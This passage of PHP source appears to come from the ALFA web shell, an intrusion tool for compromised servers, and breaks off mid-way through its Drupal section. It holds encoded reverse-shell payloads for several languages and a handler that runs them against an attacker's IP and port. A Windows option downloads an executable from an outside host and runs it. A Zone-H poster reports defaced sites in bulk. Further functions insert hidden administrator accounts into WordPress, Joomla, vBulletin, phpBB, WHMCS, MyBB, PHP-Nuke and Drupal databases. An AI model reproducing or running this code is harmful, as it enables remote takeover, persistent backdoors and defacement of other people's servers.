$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";

$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";

$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";

$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";

echo "

| Back Connect |


";

echo "



Mehtod:
  
Use:
  
IP:
 
 
Port: 
  
Run ` nc -l -v -p port ` on your computer and press ` >> ` button

";

if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){

$lang = $_POST['alfa1'];

$ip = $_POST['alfa2'];

$port = $_POST['alfa3'];

$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);

$tmpdir = ALFA_TEMPDIR;

$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);

$allow = array('perl','ruby','python','node');

eval('$lan=$'.$lang.';');

if(in_array($lang,$allow)){

if(__write_file($name,__get_resource($lan))){

if(_alfa_can_runCommand(true,true)){

$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';

$out = alfaEx("$lang $name $arg $os");

if($out==''){$out="
[ Finished...! ]
";}

echo("
{$out}
");

}

}else{

echo("
[ Failed...! ]
");

}

}

if($lang=='java'||$lang=='c'){

$code = __get_resource($lan);

$out = nl2br(bcinit($lang, $code,'',''));

echo("
{$out}
");

}

if($lang=='bcwin'){

$alfa = new AlfaCURL();

$s = $alfa->Send('http://solevisible.com/bc/windows.exe');

$tmpdir = ALFA_TEMPDIR;

$f = @fopen($tmpdir.'/bcwin.exe','w+');

@fwrite($f, $s);

@fclose($f);

$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);

}

if($lang=='php'){

echo "
";

$code = __get_resource($lan);

if($code!==false){

$code = "\$target = \"".$arg."\";\n".$code;

eval($code);

echo("
[ Finished...! ]
");

}

echo "
";

}

}

echo "
";

alfafooter();

}

function alfazoneh(){

alfahead();

echo '
';

if(!function_exists('curl_version')){

echo "
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
";

}

$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');

$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');

echo '



| Zone-h Mass Poster |




>\'); return false;">

















';

if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){

ob_start();

$hacker = $_POST['alfa1'];

$method = $_POST['alfa2'];

$neden = $_POST['alfa3'];

$site = $_POST['alfa4'];

if(empty($hacker)){

die (__pre()."
[+] YOU MUST FILL THE ATTACKER NAME [+]
");

}elseif($method == "------------------------------------SELECT-------------------------------------"){

die(__pre()."
[+] YOU MUST SELECT THE METHOD [+]
");

}elseif($neden == "------------------------------------SELECT-------------------------------------"){

die(__pre()."
[+] YOU MUST SELECT THE REASON [+]
");

}elseif(empty($site)){

die(__pre()."
[+] YOU MUST INTER THE SITES LIST [+]
");

}

$i = 0;

$sites = explode("\n", $site);

$alfa = new AlfaCURL();

while($i < count($sites)){

if(substr($sites[$i], 0, 4) != "http"){

$sites[$i] = "http://".$sites[$i];

}

$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);

++$i;

}

echo __pre()."
[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]
";

}

echo "
";

alfafooter();

}

function alfapwchanger(){

alfahead();



echo '

| Add New Admin |



';

$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));

Alfa_Create_A_Tag('pwchanger',$vals);

echo '
';

if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){



echo __pre().'
| WordPress |



'.getConfigHtml('wp').'
>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){

$localhost = $_POST['alfa3'];

$database = $_POST['alfa4'];

$username = $_POST['alfa5'];

$password = $_POST['alfa6'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));

$sole = @mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis = @mysqli_fetch_assoc($solevisible);

$res = $solevis['ID'];

}

$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){



echo __pre().'
| Joomla |
'.getConfigHtml('joomla').'
>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa3'];

$database = $_POST['alfa4'];

$username = $_POST['alfa5'];

$password = $_POST['alfa6'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));

$sole =@mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis =@mysqli_fetch_assoc($solevisible);

$res = $solevis['id'];

}

$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){



echo __pre().'
| vBulletin |
'.getConfigHtml('vb').'
>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa5'];

$password = $_POST['alfa6'];

$prefix = $_POST['alfa7'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());

$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");

$pw_col = @mysqli_num_rows($pw_col);

$adm_perm = "16744444";

if($pw_col > 0){

$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*
}else{

$adm_perm = "2143256444";

$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','$admin','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));

}

$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));

$sole = mysqli_num_rows($solevisible);

if($sole == 1){

$solevis = mysqli_fetch_assoc($solevisible);

$res = $solevis['userid'];

}

$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){



echo __pre().'
| phpBB |
'.getConfigHtml('phpbb').'
>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa4'];

$password = $_POST['alfa6'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$hash = md5('solevisible');

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');

}

}

}

if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){



echo __pre().'
| Whmcs |
'.getConfigHtml('whmcs').'
>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa4'];

$password = $_POST['alfa5'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){



echo __pre().'
| Mybb |
'.getConfigHtml('mybb').'
>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa4'];

$password = $_POST['alfa5'];

$admin = $_POST['alfa8'];

$SQL = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){



echo __pre().'
| PhpNuke |
'.getConfigHtml('phpnuke').'
>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 'td8' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')

);

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa4'];

$password = $_POST['alfa5'];

$admin = $_POST['alfa7'];

$SQL = $_POST['alfa9'];

$prefix = $_POST['alfa10'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$hash = md5($pwd);

$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){



echo __pre().'
| Drupal |
'.getConfigHtml('drupal').'
>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

